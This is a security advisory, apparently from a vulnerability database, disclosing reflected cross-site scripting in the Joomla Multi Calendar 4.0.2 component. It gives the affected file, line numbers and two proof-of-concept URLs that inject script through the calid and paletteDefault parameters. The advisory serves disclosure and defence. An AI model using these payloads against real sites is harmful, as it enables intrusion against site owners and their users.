Joomla Multi Calendar 4.0.2 Cross Site Scripting

2014.03.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hello, Multiple cross-site scripting (XSS) vulnerabilities in Multi calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault parameter to index.php. File: /tmpl/layout_editevent.php Lines: 161 and 481 POC: http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script> File: /tmpl/layout_editevent.php Line: 319 POC: http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script> Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. Best Regards.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top